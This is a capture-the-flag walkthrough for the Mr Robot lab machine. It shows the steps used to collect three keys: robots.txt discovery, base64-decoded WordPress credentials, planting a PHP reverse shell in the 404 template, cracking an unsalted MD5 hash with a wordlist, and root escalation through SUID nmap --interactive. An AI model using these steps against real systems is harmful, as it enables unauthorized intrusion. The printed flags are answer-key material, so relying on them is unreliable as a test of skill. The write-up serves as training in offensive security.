Mr Robot CTF


Challenge

Mr Robot CTF

Goal

Can you root this Mr. Robot styled machine? This is a virtual machine meant for beginners/intermediate users. There are 3 hidden keys located on the machine, can you find them?

Hints

key 1

Robots

key 2

There's something fishy about this wordlist. Why is it so long?

key 3

nmap

Walkthrough

Key 1

┌──(kali㉿kali)-[~]
└─$ curl http://10.10.238.241/robots.txt
User-agent: *
fsocity.dic
key-1-of-3.txt

┌──(kali㉿kali)-[~]
└─$ curl http://10.10.238.241/key-1-of-3.txt
073403c8a58a1f80d943455fb30724b9

robots.txt is an ASCII text file placed in a site's web root. It tells search-engine crawlers (also called web spiders) which parts of the site they should not fetch and which parts they may. It is purely advisory and is readable by anyone, so every path listed in it is effectively advertised to whoever requests it.

There is also a wordlist, fsocity.dic, which will presumably be needed later.

Key 2

A directory scan turns up /license.txt, which contains a set of credentials: elliot:ER28-0652

┌──(kali㉿kali)-[~]
└─$ curl http://10.10.238.241/license

what you do just pull code from Rapid9 or some s@#% since when did you become a script kitty?

do you want a password or something?

ZWxsaW90OkVSMjgtMDY1Mgo=

┌──(kali㉿kali)-[~]
└─$ echo "ZWxsaW90OkVSMjgtMDY1Mgo=" | base64 --decode
elliot:ER28-0652

/wp-login.php shows the WordPress admin login page; log in to the back end with these credentials.
Once logged in, install a WordPress reverse-shell plugin to obtain a shell.


Next, look for key-2-of-3.txt:

find / -name key-2-of-3.txt
/home/robot/key-2-of-3.txt

Here, however, the file cannot be printed directly, presumably because of insufficient permissions. In /home/robot/ there is another file, password.raw-md5; printing it gives robot's password hash, and, as the file name says, it is a bare unsalted MD5 digest, so a wordlist lookup recovers the password: abcdefghijklmnopqrstuvwxyz

cat /home/robot/password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
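As an added illustration (not part of the original writeup), the Python below shows why a bare password.raw-md5 file is weak: the hash line shown above is matched against a small constructed stand-in for fsocity.dic in a single lookup, while the same password stored with a salted, iterated hash (PBKDF2, a swapped-in defensive alternative chosen for this example) produces a different digest per salt and costs far more per guess.

```python
import hashlib
import hmac
from typing import List, Optional

# The hash line as shown in the writeup: "user:hex-md5", no salt, no iteration count.
RAW_MD5_LINE = "robot:c3fcd3d76192e4007dfb496cca67e13b"

# Constructed stand-in for fsocity.dic; the real wordlist is far longer.
WORDLIST: List[str] = [
    "password", "123456", "robot", "mrrobot",
    "abcdefghijklmnopqrstuvwxyz", "fsociety",
]


def lookup_raw_md5(hash_line: str, wordlist: List[str]) -> Optional[str]:
    """Return the wordlist entry whose unsalted MD5 equals the stored digest.

    Because nothing is mixed in, one precomputed table of MD5(word) serves every
    user on every system: a single lookup, no per-account work."""
    _user, digest = hash_line.strip().split(":", 1)
    for word in wordlist:
        if hashlib.md5(word.encode()).hexdigest() == digest.lower():
            return word
    return None


def pbkdf2_hash(password: str, salt: bytes, iterations: int = 200_000) -> str:
    """Salted, iterated hash: what raw-md5 should have been.

    The random salt makes a precomputed table useless across accounts, and the
    iteration count makes each guess cost far more than one MD5."""
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_pbkdf2(password: str, stored: str) -> bool:
    """Check a password against a pbkdf2_hash() string in constant time."""
    _algo, iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    pw = lookup_raw_md5(RAW_MD5_LINE, WORDLIST)
    print("raw-md5 lookup recovered:", pw)
    # A real system would draw the salt from os.urandom(16); fixed here for reproducibility.
    stored = pbkdf2_hash(pw, salt=b"\x00" * 16)
    print("same password, salted + iterated:", stored[:60], "...")
    print("verifies:", verify_pbkdf2(pw, stored))
```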


After this point my shell started behaving strangely for some reason, so I found a different PHP reverse shell and put it in the 404 page (WordPress back end -> Appearance -> Editor), got a new shell, switched user to robot, and got key 2.

$ su - robot 
Password: abcdefghijklmnopqrstuvwxyz
$ whoami
robot
$ cd /home/robot/
$ ls
key-2-of-3.txt  password.raw-md5
$ cat ke*
822c73956184f694993bede3eb39f959
$ 

Key 3

Look for a way to escalate privileges; the SUID bit on nmap stands out, which matches the hint.

$ find / -user root -perm -4000 -print 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
$ 

Next, nmap's interactive mode yields key 3. This old 3.81 build still has --interactive, whose ! prefix runs shell commands, and because the binary is SUID root those commands run as root; the mode was removed from later nmap releases, and the SUID bit on nmap is the misconfiguration here.

$ nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help

nmap> !cat /root/*.txt
!cat /root/*.txt
04787ddef27c3dee1ee161b21670b4e4